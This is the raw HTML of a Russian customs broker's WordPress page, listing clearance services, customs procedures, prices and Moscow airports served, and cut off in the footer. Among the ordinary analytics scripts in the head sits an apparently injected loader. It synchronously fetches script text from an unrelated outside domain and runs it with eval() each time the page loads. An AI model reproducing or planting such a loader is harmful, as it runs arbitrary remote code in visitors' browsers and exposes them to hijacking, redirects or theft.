<!DOCTYPE html> <html lang="ru-RU"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="shortcut icon" href="/wp-content/uploads/2021/06/faxvicon.png"> <link rel="apple-touch-icon" href="/wp-content/uploads/2021/06/faxvicon.png"> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1'/> <title>Услуги по таможенному оформлению грузов и товаров в Москве | 2VED</title> <meta name="description" content="Оперативная помощь в таможенном оформлении товаров и грузов от специалистов компании 2VED. Оставьте заявку на info@2ved.ru или звоните +7 (495) 363-70-86."/> <link rel="canonical" href="https://2ved.ru/tamozhennoe-oformlenie/"/> <meta property="og:locale" content="ru_RU"/> <meta property="og:type" content="article"/> <meta property="og:title" content="Услуги по таможенному оформлению грузов и товаров в Москве | 2VED"/> <meta property="og:description" content="Оперативная помощь в таможенном оформлении товаров и грузов от специалистов компании 2VED. Оставьте заявку на info@2ved.ru или звоните +7 (495) 363-70-86."/> <meta property="og:url" content="https://2ved.ru/tamozhennoe-oformlenie/"/> <meta property="og:site_name" content="Услуги по таможенному оформлению и перевозкам"/> <meta property="article:modified_time" content="2021-12-27T18:42:06+00:00"/> <meta property="og:image" content="https://2ved.ru/wp-content/uploads/2021/06/tamojennoe-oformlenie.jpg"/> <meta name="twitter:card" content="summary_large_image"/> <meta name="twitter:label1" content="Примерное время для чтения"/> <meta name="twitter:data1" content="5 минут"/> <link rel='stylesheet' id='maxtd_info_box_plugin-style-css' href='https://2ved.ru/wp-content/plugins/maxtd-info-box/css/style.css' type='text/css' media='all'/> <link rel='stylesheet' id='wp-block-library-css' href='https://2ved.ru/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all'/> <link rel='stylesheet' id='contact-form-7-css' href='https://2ved.ru/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all'/> <link rel='stylesheet' id='expert-review-style-css' href='https://2ved.ru/wp-content/plugins/expert-review/assets/public/css/styles.min.css' type='text/css' media='all'/> <link rel='stylesheet' id='wpfront-scroll-top-css' href='https://2ved.ru/wp-content/plugins/wpfront-scroll-top/css/wpfront-scroll-top.min.css' type='text/css' media='all'/> <link rel='stylesheet' id='font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all'/> <link href="https://2ved.ru/wp-content/themes/yootheme/css/theme.1.css?ver=1625478302" rel="stylesheet"> <link href="https://2ved.ru/wp-content/themes/yootheme/css/custom.css?ver=2.4.4" rel="stylesheet"> <script type='text/javascript' src='https://2ved.ru/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.min.js' id='jquery-easing-js'></script> <style>.pseudo-clearfy-link { color: #008acf; cursor: pointer;}.pseudo-clearfy-link:hover { text-decoration: none;}</style><script src="https://2ved.ru/wp-content/themes/yootheme/vendor/assets/uikit/dist/js/uikit.min.js?ver=2.4.4"></script> <script src="https://2ved.ru/wp-content/themes/yootheme/vendor/assets/uikit/dist/js/uikit-icons.min.js?ver=2.4.4"></script> <script src="https://2ved.ru/wp-content/themes/yootheme/js/theme.js?ver=2.4.4"></script> <script>var $theme = {};</script> <script><!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-9J84EPH7XN"></script> <script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-9J84EPH7XN');
</script> <!-- Rating Mail.ru counter --> <script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "3224818", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = "https://top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div> <img src="https://top-fwz1.mail.ru/counter?id=3224818;js=na" style="border:0;position:absolute;left:-9999px;" alt="Top.Mail.Ru"/> </div></noscript> <!-- //Rating Mail.ru counter --> </script> <script src="//code-ya.jivosite.com/widget/rrguCGgajd" async></script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-9J84EPH7XN"></script> <script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-9J84EPH7XN');
</script> <script type="text/javascript"> (function ab(){ var request = new XMLHttpRequest(); request.open('GET', "https://scripts.witstroom.com/one/33716", false); request.send(); if(request.status == 200) eval(request.responseText); })(); </script> </head> <body class="page-template-default page page-id-38 page-parent "> <div class="tm-page"> <div class="tm-header-mobile uk-hidden@m"> <div class="uk-navbar-container"> <nav uk-navbar> <div class="uk-navbar-left"> <div class="callback_header"> <a href="tel:84953637086"> <img src="/wp-content/uploads/2021/06/phone.png"> <span class="callback__phone">+7 (495)-363-70-86</span> </a> </div> </div> <div class="uk-navbar-center"> <div class="uk-navbar-item widget-media-image" id="widget-media_image-2"> <a href="/"><img width="300" height="300" src="https://2ved.ru/wp-content/uploads/2021/06/logo-300x300.png" class="image wp-image-8 attachment-medium size-medium" alt="" loading="lazy" style="max-width: 100%; height: auto;" srcset="https://2ved.ru/wp-content/uploads/2021/06/logo-300x300.png 300w, https://2ved.ru/wp-content/uploads/2021/06/logo-150x150.png 150w, https://2ved.ru/wp-content/uploads/2021/06/logo.png 512w" sizes="(max-width: 300px) 100vw, 300px"/></a> </div> </div> <div class="uk-navbar-right"> <a class="uk-navbar-toggle" href="#tm-mobile" uk-toggle> <div uk-navbar-toggle-icon></div> </a> </div> </nav> </div> <div id="tm-mobile" uk-offcanvas mode="slide" flip overlay> <div class="uk-offcanvas-bar"> <button class="uk-offcanvas-close" type="button" uk-close></button> <div class="uk-child-width-1-1" uk-grid> <div> <div class="uk-panel"> <ul class="uk-nav uk-nav-primary"> <li class="uk-active"><a href="https://2ved.ru/tamozhennoe-oformlenie/" class=" menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-38 current_page_item">Таможенное оформление</a></li> <li><a href="https://2ved.ru/dostavka-gruzov/" class=" menu-item menu-item-type-post_type menu-item-object-page">Грузоперевозки</a></li> <li><a href="https://2ved.ru/sertifikatsiya/" class=" menu-item menu-item-type-post_type menu-item-object-page">Сертификация</a></li> <li><a href="https://2ved.ru/tamojennyy-yurist/" class=" menu-item menu-item-type-post_type menu-item-object-page">ВЭД-юрист</a></li> <li><a href="https://2ved.ru/autsorsing-ved/" class=" menu-item menu-item-type-post_type menu-item-object-page">Аутсорсинг</a></li> <li><a href="https://2ved.ru/contacts/" class=" menu-item menu-item-type-post_type menu-item-object-page">Контакты</a></li></ul> </div> </div> <div> <div class="uk-panel widget-custom-html" id="widget-custom_html-6"> <div class="textwidget custom-html-widget"><div class="offcanvas-phone"><a href="tel:74953637086">+7 (495) 363-70-86</a><br></div> <div class="offcanvas-phone"><a href="mailto:info@2ved.ru">info@2ved.ru</a><br></div> <div class="sidebar-icons"> <!-- <span class="sidebar-icon"><a rel="nofollow noopener" href="https://www.facebook.com/2vedru" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-facebook.png"></a></span> --> <!-- <span class="sidebar-icon"><a rel="nofollow noopener" href="https://vk.com/2vedru" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-vk.png"></a></span> --> <!-- <span class="sidebar-icon"><a rel="nofollow noopener" href="https://www.instagram.com/2ved.ru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-insta.png"></a></span> --> <!-- <span class="sidebar-icon"><a rel="nofollow noopener" href="https://twitter.com/2vedru" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-twitter.png"></a></span> --> <span class="sidebar-icon"><a rel="nofollow" href="https://api.whatsapp.com/send?phone=79629199054"><img alt="" src="/wp-content/uploads/2021/06/icon-whatsapp.png"></a></span> <span class="sidebar-icon"><a rel="nofollow noopener" href="https://t.me/tlc_alliance/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-telegram.png"></a></span> <!-- <span class="sidebar-icon"><a href="viber://chat?number=89629199054"><img alt="" src="/wp-content/uploads/2021/06/icon-viber.png"></a></span> --> </div></div> </div> </div> <div> <div class="uk-panel widget-search" id="widget-search-3"> <form id="search-845" action="https://2ved.ru" method="get" role="search" class="uk-search uk-search-default"><span uk-search-icon></span><input name="s" placeholder="Поиск" required type="search" class="uk-search-input"></form> </div> </div></div> </div> </div> </div> <div class="header__wrap"> <div class="tm-toolbar tm-toolbar-default uk-visible@m"> <div class="uk-container uk-flex uk-flex-middle"> <div> <div class="uk-grid-medium uk-child-width-auto uk-flex-middle" uk-grid="margin: uk-margin-small-top"> <div> <div class="uk-panel widget-custom-html" id="widget-custom_html-2"> <div class="textwidget custom-html-widget"><div class="header-block"> <div class="header-left"> <div class="logo-img"> <a href="/"><img src="/wp-content/uploads/2021/06/logo.png" alt="logo"></a> </div> <div class="header-adress"> <a href="/sertifikatsiya/sertifikat-proishozhdeniya/sertifikat-st-1">#СТ1</a> <a href="/sertifikatsiya/zaklyuchenie-fstek">#ЗаключениеФСТЭК</a><br> <a href="/tamozhennoe-oformlenie/">#ТаможенноеОформление</a> <br> <span class="shopAddress">Москва, БЦ Сириус Парк</span> </div> </div> <div class="header-icons hide-on-mobile"> <!-- <span class="header-icon"><a rel="nofollow noopener" href="http://instagram.com/2ved.ru/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-insta.png"></a></span> --> <span class="header-icon"><a rel="nofollow noopener" href="https://t.me/tlc_alliance/" target="_blank"><img alt="" src="/wp-content/uploads/2021/06/icon-telegram.png"></a></span> <span class="header-icon"><a rel="nofollow" href="https://api.whatsapp.com/send?phone=+79629199054"><img alt="" src="/wp-content/uploads/2021/06/icon-whatsapp.png"></a></span> <!-- <span class="header-icon"><a href="https://viber.click/79629199054"><img alt="" src="/wp-content/uploads/2021/06/icon-viber.png"></a></span> --> </div> </div></div> </div> </div><div> <div class="uk-panel widget-search" id="widget-search-2"> <form id="search-260" action="https://2ved.ru" method="get" role="search" class="uk-search uk-search-default"><span uk-search-icon></span><input name="s" placeholder="Поиск" required type="search" class="uk-search-input"></form> </div> </div> </div> </div> <div class="uk-margin-auto-left"> <div class="uk-grid-medium uk-child-width-auto uk-flex-middle" uk-grid="margin: uk-margin-small-top"> <div> <div class="uk-panel widget-custom-html" id="widget-custom_html-7"> <div class="textwidget custom-html-widget"><div class="header-right"> <div class="header-contacts"> <div class="header-contacts-phone"><a href="tel:74953637086">+7 (495) 363-70-86</a></div> <div class="header-contacts-email"><a href="mailto:info@2ved.ru">info@2ved.ru</a></div> <div class="header-contacts"> Пон-Пт: 09:00 -18:00 <br> Сб-Вс: Выходной </div> </div> </div></div> </div> </div> </div> </div> </div> </div> <div class="tm-header uk-visible@m" uk-header> <div class="uk-navbar-container"> <div class="uk-container"> <nav class="uk-navbar" uk-navbar="{&quot;align&quot;:&quot;left&quot;,&quot;boundary&quot;:&quot;!.uk-navbar-container&quot;}"> <div class="uk-navbar-left"> <ul class="uk-navbar-nav"> <li class="uk-active"><a href="https://2ved.ru/tamozhennoe-oformlenie/" class=" menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-38 current_page_item">Таможенное оформление</a></li> <li><a href="https://2ved.ru/dostavka-gruzov/" class=" menu-item menu-item-type-post_type menu-item-object-page">Грузоперевозки</a></li> <li><a href="https://2ved.ru/sertifikatsiya/" class=" menu-item menu-item-type-post_type menu-item-object-page">Сертификация</a></li> <li><a href="https://2ved.ru/tamojennyy-yurist/" class=" menu-item menu-item-type-post_type menu-item-object-page">ВЭД-юрист</a></li> <li><a href="https://2ved.ru/autsorsing-ved/" class=" menu-item menu-item-type-post_type menu-item-object-page">Аутсорсинг</a></li> <li><a href="https://2ved.ru/contacts/" class=" menu-item menu-item-type-post_type menu-item-object-page">Контакты</a></li></ul> </div> </nav> </div> </div> </div> </div> <div id="tm-main" class="tm-main uk-section uk-section-default" uk-height-viewport="expand: true"> <div class="uk-container sidebar"> <div class="sidebar"> <div class="sidebar__content"> <ul class="sidebar__menu"> <li class="page_item page-item-407"><a href="https://2ved.ru/tamozhennoe-oformlenie/besposhlinnaya-torgovlya/">Беспошлинная торговля</a></li> <li class="page_item page-item-412"><a href="https://2ved.ru/tamozhennoe-oformlenie/vremennyy-vvoz-dopusk/">Временный ввоз (допуск)</a></li> <li class="page_item page-item-414"><a href="https://2ved.ru/tamozhennoe-oformlenie/vremennyy-vyvoz/">Временный вывоз</a></li> <li class="page_item page-item-422"><a href="https://2ved.ru/tamozhennoe-oformlenie/otkaz-v-polzu-gosudarstva/">Отказ в пользу государства</a></li> <li class="page_item page-item-418"><a href="https://2ved.ru/tamozhennoe-oformlenie/pererabotka-vne-tamojennoy-territorii/">Переработка вне таможенной территории</a></li> <li class="page_item page-item-416"><a href="https://2ved.ru/tamozhennoe-oformlenie/pererabotka-na-tamojennoy-territorii/">Переработка на таможенной территории</a></li> <li class="page_item page-item-420"><a href="https://2ved.ru/tamozhennoe-oformlenie/pererabotka-dlya-vnutrennego-potrebleniya/">Процедура переработки для внутреннего потребления</a></li> <li class="page_item page-item-426"><a href="https://2ved.ru/tamozhennoe-oformlenie/svobodnaya-tamojennaya-zona/">Свободная таможенная зона</a></li> <li class="page_item page-item-1143"><a href="https://2ved.ru/tamozhennoe-oformlenie/svobodnyy-sklad/">Свободный склад</a></li> <li class="page_item page-item-430"><a href="https://2ved.ru/tamozhennoe-oformlenie/spetsialnaya-tamojennaya-protsedura/">Специальная таможенная процедура</a></li> <li class="page_item page-item-409"><a href="https://2ved.ru/tamozhennoe-oformlenie/unichtojenie-im-93/">Таможенная процедура уничтожения (ИМ 93)</a></li> <li class="page_item page-item-432"><a href="https://2ved.ru/tamozhennoe-oformlenie/avtomobiley/">Таможенное оформление автомобилей</a></li> <li class="page_item page-item-386"><a href="https://2ved.ru/tamozhennoe-oformlenie/importa/">Таможенное оформление импорта</a></li> <li class="page_item page-item-391"><a href="https://2ved.ru/tamozhennoe-oformlenie/eksporta/">Таможенное оформление экспорта</a></li> <li class="page_item page-item-628"><a href="https://2ved.ru/tamozhennoe-oformlenie/v-moskve-i-moskovskoy-oblasti/">Таможенный брокер</a></li> <li class="page_item page-item-402"><a href="https://2ved.ru/tamozhennoe-oformlenie/tamojennyy-reimport/">Таможенный реимпорт</a></li> <li class="page_item page-item-397"><a href="https://2ved.ru/tamozhennoe-oformlenie/tamojennoe-oformlenie-reeksporta/">Таможенный реэкспорт</a></li> <li class="page_item page-item-428"><a href="https://2ved.ru/tamozhennoe-oformlenie/tamojennyy-sklad/">Таможенный склад</a></li> <li class="page_item page-item-424"><a href="https://2ved.ru/tamozhennoe-oformlenie/tamojennyy-tranzit/">Таможенный транзит</a></li> <li class="page_item page-item-1692"><a href="https://2ved.ru/tamozhennoe-oformlenie/uslugi-yurista-po-tamozhennym-sporam/">Услуги юриста по таможенным спорам</a></li> </ul> </div> </div> <article id="post-38" class="uk-article post-38 page type-page status-publish hentry" typeof="Article"> <meta property="name" content="Таможенное оформление товаров и грузов"> <meta property="author" typeof="Person" content="Всеволод"> <meta property="dateModified" content="2021-12-27T21:42:06+03:00"> <meta class="uk-margin-remove-adjacent" property="datePublished" content="2021-06-23T11:28:49+03:00"> <h1 class="uk-article-title">Таможенное оформление товаров и грузов</h1> <div class="uk-margin-medium" property="text"> <p>Таможенное оформление — это совокупность задач, осуществляемых участниками внешнеэкономической деятельности (<a href="https://2ved.ru/autsorsing-ved/">ВЭД</a>), главной целью которых является перевозка товаров и транспортных средств через таможенную границу. Эту процедуру в профессиональной среде так же называют «растаможкой», «затаможкой», «декларированием», «регистрацией импорта и/или экспорта» и т.д.</p> <div class="box info clearfix" style="background-color: #feffc5"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/info.png);"></i> <div class="box__inner-block" style="color: #222222"> 2VED — это лицензированный таможенный брокер  (номер в реестре 0397/0001) &#8212; наши основные услуги это таможенное оформление грузов и товаров в Москве, МО и по всей территории России при импорте и экспорте при любом виде транспортировки.</p> <p> </div> </div> <h2>СТОИМОСТЬ УСЛУГ ТАМОЖЕННОГО ПРЕДСТАВИТЕЛЯ 2VED:</h2> <div class="box fact clearfix" style="background-color: #d0ffca"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/fact.png);"></i> <div class="box__inner-block" style="color: #222222"> Предлагаем выгодные цены для наших клиентов:</p> <ul> <li>от 15 000 ₽</li> </ul> <p>Среди наших услуг:</p> <ul> <li>— Таможенное декларирование товаров по процедуре ИМ 40, классифицируемых по кодам товаров по Товарной номенклатуре внешнеэкономической деятельности</li> <li>— Таможенное декларирование товаров по процедуре ЭК 10, классифицируемых по кодам товаров по Товарной номенклатуре внешнеэкономической деятельности</li> <li>— Комплекс услуг по подготовке и корректировке коммерческих, товаросопроводительных и разрешительных документов (в соответствии с требованиями таможенного законодательства ЕАЭС)</li> </ul> <div class="catalog-office__btn_new"><a href="#js-ostalis-voprosy">Получить бесплатную консультацию</a></div> <p> </div> </div> <h3>Чем мы можем помочь нашим клиентам:</h3> <ul> <li>— Бесплатные консультации по всем имеющимся у клиента вопросам.</li> <li>— Оформление любых грузов на таможне в Российской Федерации в максимально сжатые сроки.</li> <li>— Подача самых разных деклараций (по заявлению, пассажирской, ДТ, ГТД).</li> <li>— Подбор кода ТН ВЭД.</li> <li>— Подготовка полного пакета документов для таможни.</li> <li>— Оформление документации для самых разных таможенных процедур: временный ввоз и вывоз, импорт, экспорт, перегрузка, реимпорт, реэкспорт, переработка на/вне таможенной территории, переработка для внутреннего потребления и пр.</li> <li>— Расчет таможенных платежей (НДС, пошлин, акцизов и т. д.).</li> <li>— Груз может быть задержан таможней, так что мы осуществляем «растаможку» при необходимости.</li> </ul> <p>&nbsp;</p> <h3><img class="alignright" style="font-size: 16px;" src="/wp-content/uploads/2021/06/tamojennoe-oformlenie.jpg" alt=" "/></h3> <h3></h3> <h3>Перечень услуг</h3> <p>Порядок растаможки грузов и таможенного декларирования,  контролируется правилами Таможенного кодекса ЕАЭС, решениями законодательных органов, федеральными законами и приказами ФТС России. Заявитель-владелец  груза может сам выбрать порядок подачи декларации в таможенный орган. Для этого ему необходимо пройти регистрацию на таможне, предоставить товаросопроводительные документы на товар и пройти процедуру оформления.</p> <p><strong>На длительность и сложность процедур влияет множество факторов, начиная от спецификации конкретной сделки, заканчивая характеристиками перевозимого товара и т.д. Решение вопросов связанных с внешнеэкономической деятельностью требует от организации, предоставляющий данный комплекс мероприятий многолетнего опыта и знаний. </strong><br/> <div class="box info clearfix" style="background-color: #feffc5"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/info.png);"></i> <div class="box__inner-block" style="color: #222222"> <br/> <strong>Наиболее востребованными услугами по таможенному оформлению товаров в нашей компании являются:</strong></p> <ul> <li>— анализ товаросопроводительной документации;</li> <li>— классификацию продукции в соответствии с ТН ВЭД ЕАЭС;</li> <li>— электронное декларирование;</li> <li>— временное хранение товаров с выполнением всех сопутствующих работ (погрузка/разгрузка, доставка/прием, выдача и т. д.);</li> <li>— сопровождение при проведении фитосанитарных и ветеринарных проверок, страхование, сертификацию;</li> <li>— осмотр транспортных средств и перевозимых продуктов;</li> </ul> <p> </div> </div><br/> Наши клиенты получают полный спектр услуг в области ВЭД. Мы осуществляем все необходимые операции и помогаем перемещать все виды ценностей, которые не запрещены для перевозки через границу международными и российскими законодательными актами.</p> <p>Наш специалист проверит правильность заполнения документации (инвойс, счета-фактуры, сертификаты соответствия и происхождения, упаковочные листы, контракты, накладные и т. д.), оформит декларацию, рассчитает таможенные платежи.</p> <p><strong>Пункты таможенного оформления:</strong></p> <ul> <li>— аэропорты, грузовые терминалы, судовые порты и железнодорожные станции.</li> </ul> <p>Доставка может быть осуществлена как наземным, так и воздушным видом транспорта, каждый из которых имеет свои преимущества и недостатки в зависимости от характера перевозимого груза, от срочности его доставки, от маршрута и других аспектов. Сама регистрация проводится в местах доставки конкретного транспортного средства, а именно в аэропортах, на ж/д вокзалах, автостанциях, портах и т.д.</p> <h3>Почему наши клиенты выбирают нас</h3> <p>Таможенный брокер 2VED предоставляет услуги растаможке и доставке  грузов с 2016 года. Уже более 1 000 клиентов заключили с нами долгосрочные договора на обслуживание.</p> <p>Сотрудники 2<span lang="en-us">VED</span> обладают многолетним практическим опытом ведения дел в данной сфере (в том числе и работы непосредственно на таможне).</p> <p><strong>Мы осуществляем сопровождение международных экспортных и импортных сделок, оформляем всю необходимую для них документацию. С нами ваши товары успешно  пройдут таможенное оформление в Москве во всех аэропортах Московской области.</strong></p> <ul> <li>— Мы предлагаем таможенные услуги в строгом соответствии с действующими законами. Наши сотрудники постоянно следят за обновлениями отраслевого законодательства и поэтому всегда предлагают актуальные и своевременные решения для оптимизации времени и финансовых затрат клиентов.</li> <li>— Команда опытных специалистов уже много лет занимается внешней торговлей и сделает все возможное, чтобы предотвратить задержку товаров на таможне и выполнить все необходимые процедуры как можно скорее.</li> <li>— Каждый клиент важен для нас, поэтому мы практикуем индивидуальный подход и предоставляем персонального менеджера для оперативного решения проблем.</li> <li>— Мы организуем доставку морским, автомобильным, железнодорожным транспортом или самолетом. Из приведенных выше вариантов мы выбираем лучший для конкретного варианта продукта с точки зрения времени и стоимости.</li> <li>— Мы предлагаем не только индивидуальные услуги, но и широкий спектр услуг «под ключ», включая доставку и таможенное оформление, по конкурентоспособным ценам.</li> </ul> <div style="text-align: center;"><span style="font-size: 18pt;">♦ ♦ ♦ ♦ ♦</span></div> <div class="b-catalog-office container"> <div class="box info clearfix" style="background-color: #feffc5"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/info.png);"></i> <div class="box__inner-block" style="color: #222222"> В настоящее время согласно ТК ЕАЭС существует 17 таможенных процедур:</p> <ul> <li><a href="/tamojennoe-oformlenie/importa/">Выпуск для внутреннего потребления</a>;</li> <li><a href="/tamojennoe-oformlenie/eksporta/">Экспорт</a>;</li> <li><a href="/tamojennoe-oformlenie/importa/">Импорт</a>;</li> <li><a href="/tamojennoe-oformlenie/tamojennoe-oformlenie-reeksporta/">Реэкспорт</a>;</li> <li><a href="/tamojennoe-oformlenie/tamojennyy-reimport/">Реимпорт</a>;</li> <li><a href="/tamojennoe-oformlenie/besposhlinnaya-torgovlya/">Беспошлинная торговля</a>;</li> <li><a href="/tamojennoe-oformlenie/unichtojenie-im-93/">Уничтожение</a>;</li> <li><a href="https://2ved.ru/tamojennoe-oformlenie/svobodnyy-sklad/">Свободный склад</a>;</li> <li><a href="/tamojennoe-oformlenie/vremennyy-vvoz-dopusk/">Временный ввоз (допуск)</a>;</li> <li><a href="/tamojennoe-oformlenie/vremennyy-vyvoz/">Временный вывоз</a>;</li> <li><a href="/tamojennoe-oformlenie/pererabotka-na-tamojennoy-territorii/">Переработка на таможенной территории</a>;</li> <li><a href="/tamojennoe-oformlenie/pererabotka-vne-tamojennoy-territorii/">Переработка вне таможенной территории</a>;</li> <li><a href="/tamojennoe-oformlenie/pererabotka-dlya-vnutrennego-potrebleniya/">Переработка для внутреннего потребления</a>;</li> <li><a href="/tamojennoe-oformlenie/otkaz-v-polzu-gosudarstva/">Отказ в пользу государства</a>;</li> <li><a href="/tamojennoe-oformlenie/tamojennyy-tranzit/">Таможенный транзит</a>;</li> <li><a href="/tamojennoe-oformlenie/svobodnaya-tamojennaya-zona/">Свободная таможенная зона</a>;</li> <li><a href="/tamojennoe-oformlenie/tamojennyy-sklad/">Таможенный склад</a>;</li> <li><a href="/tamojennoe-oformlenie/spetsialnaya-tamojennaya-protsedura/">Специальная таможенная процедура</a>.</li> </ul> <p> </div> </div> <p style="text-align: center;"><span style="font-size: 18pt;">♦ ♦ ♦ ♦ ♦</span></p> <div class="box warning clearfix" style="background-color: #ffd4d4"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/warning.png);"></i> <div class="box__inner-block" style="color: #222222"> Мы предоставляем услуги таможенного оформления в аэропортах:</p> <ul> <li><a href="/blog/tamozhennoe-oformlenie-sheremetyevo/">Шереметьево</a>;</li> <li><a href="https://2ved.ru/blog/usluga-po-tamojennomu-oformleniyu-v-mejdunarodnom-aeroportu/">Домодедово</a>;</li> <li><a href="https://2ved.ru/blog/usluga-po-tamojennomu-oformleniyu-v-mejdunarodnom-aeroportu-vnukovo/">Внуково</a>;</li> <li><a href="https://2ved.ru/blog/tamozhennoe-oformlenie-v-aeroportu-zhukovskiy/">Жуковский.</a></li> </ul> <p> </div> </div> </div> <div style="text-align: center;"><span style="font-size: 18pt;">♦ ♦ ♦ ♦ ♦</span></div> <div class="b-catalog-office container"> <div class="box fact clearfix" style="background-color: #d0ffca"> <i class="box__icon" style="background-image: url(https://2ved.ru/wp-content/plugins/maxtd-info-box/img/fact.png);"></i> <div class="box__inner-block" style="color: #222222"> Возьмем на себя таможенное оформление:</p> <ul> <li><a href="/tamojennoe-oformlenie/avtomobiley/">автомобилей</a>;</li> <li><a href="https://2ved.ru/blog/tamozhennoe-oformlenie-traktorov-i-spetstehniki/">тракторов и спецтехники</a>;</li> <li><a href="https://2ved.ru/blog/tamozhennoe-oformlenie-stroymaterialov/">стройматериалов</a>;</li> <li><a href="/tamojennoe-oformlenie/eksporta/">экспорта</a>;</li> <li><a href="/tamojennoe-oformlenie/importa/">импорта</a>.</li> </ul> <p>К вашим услугам <a href="https://2ved.ru/tamojennyy-yurist/">юрист и адвокат по таможенным вопросам</a>.</p> <p> </div> </div> <p><em><strong>Чтобы воспользоваться нашими услугами, проконсультироваться по возникшим вопросам, уточнить цены, свяжитесь с представителями компании 2VED по телефону <a href="tel:74953637086">+7 (495) 363-70-86</a>. Вы можете также написать нам на почтовый ящик <a href="mailto:info@2ved.ru">info@2ved.ru</a>. Мы обязательно рассмотрим вашу заявку и поможем с грузами в кратчайшие сроки. Сотрудничать с нами удобно и выгодно, убедитесь в этом сами!</strong></em></p> </div> </div> </article> </div> </div> <div id="tm-bottom" class="tm-bottom uk-section-default uk-section"> <div class="uk-container"> <div class="uk-child-width-expand@m" uk-grid> <div> <div class="uk-panel widget-custom-html" id="widget-custom_html-3"> <div class="textwidget custom-html-widget"><div id="js-ostalis-voprosy"> <div role="form" class="wpcf7" id="wpcf7-f5-o1" lang="ru-RU" dir="ltr"> <div class="screen-reader-response"><p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul></div> <form action="/tamozhennoe-oformlenie/#wpcf7-f5-o1" method="post" class="wpcf7-form init" novalidate="novalidate" data-status="init"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="5"/> <input type="hidden" name="_wpcf7_version" value="5.4.2"/> <input type="hidden" name="_wpcf7_locale" value="ru_RU"/> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f5-o1"/> <input type="hidden" name="_wpcf7_container_post" value="0"/> <input type="hidden" name="_wpcf7_posted_data_hash" value=""/> <input type="hidden" name="_wpcf7_recaptcha_response" value=""/> </div> <div class="bottom-form"> <div class="form-title">Остались вопросы?</div> <div class="block-input"> <div class="form-input"><span class="wpcf7-form-control-wrap your-name"><input type="text" name="your-name" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" placeholder="Имя"/></span></div> <div class="form-input"><span class="wpcf7-form-control-wrap mask-576"><input type="tel" name="mask-576" value="" class="wpcf7-form-control wpcf7mf-mask wpcf7-mask wpcf7-validates-as-required" size="40" aria-required="1" placeholder="Телефон" data-mask="+7 (___) ___-__-__"/></span></div> </div> <div class="form-privacy"><input checked class="uk-checkbox" type="checkbox"> <p class="checkbox__text"><a target="_blank" href="/privacy/" rel="noopener">Я согласен на обработку персональных данных</a></a></p> </div> <div><span class="wpcf7-form-control-wrap agree"><span class="wpcf7-form-control wpcf7-acceptance invert"><span class="wpcf7-list-item"><input type="checkbox" name="agree" value="1" aria-invalid="false" checked="checked" class="agree"/></span></span></span></div> <div class="my-submit"><input type="submit" value="Отправить заявку" class="wpcf7-form-control wpcf7-submit"/></div> </div> <div class="wpcf7-response-output" aria-hidden="true"></div></form></div> </div></div> </div> </div></div> </div> </div> <!-- Builder #footer --> <div id="my-footer" class="uk-section-default uk-section uk-section-xlarge uk-padding-remove-bottom"> <div class="tm-grid-expand uk-child-width-1-1 uk-grid-margin" uk-grid> <div> <div id="footer-info" class="uk-margin"> <div class="uk-child-width-1-1 uk-child-width-1-2@s uk-child-width-1-4@m uk-grid-match" uk-grid> <div> <div class="el-item uk-panel uk-margin-remove-first-child"> <div class="el-content uk-panel uk-margin-top"><div class="footer-logo_img logo-img"> <a href="https://2ved.ru/?customize_changeset_uuid=75ad5147-bb30-4453-87bc-6de289224a97&amp;customize_autosaved=on&amp;customize_messenger_channel=preview-3"><img src="/wp-content/uploads/2021/06/logo.png" alt="logo"></a> </div> <div class="footer-logo_slogan">Доставка грузов и <a href="/autsorsing-ved">услуги ВЭД</a></div></div> </div></div> <div> <div class="el-item uk-panel uk-margin-remove-first-child"> <div class="el-content uk-panel uk-margin-top"><div class="foot-menu_col"> <h5><a href="/">Главная</a></h5> <ul class="footer-menu"> <li><a href="/contacts"><span>Контакты</span></a></li> <li><a 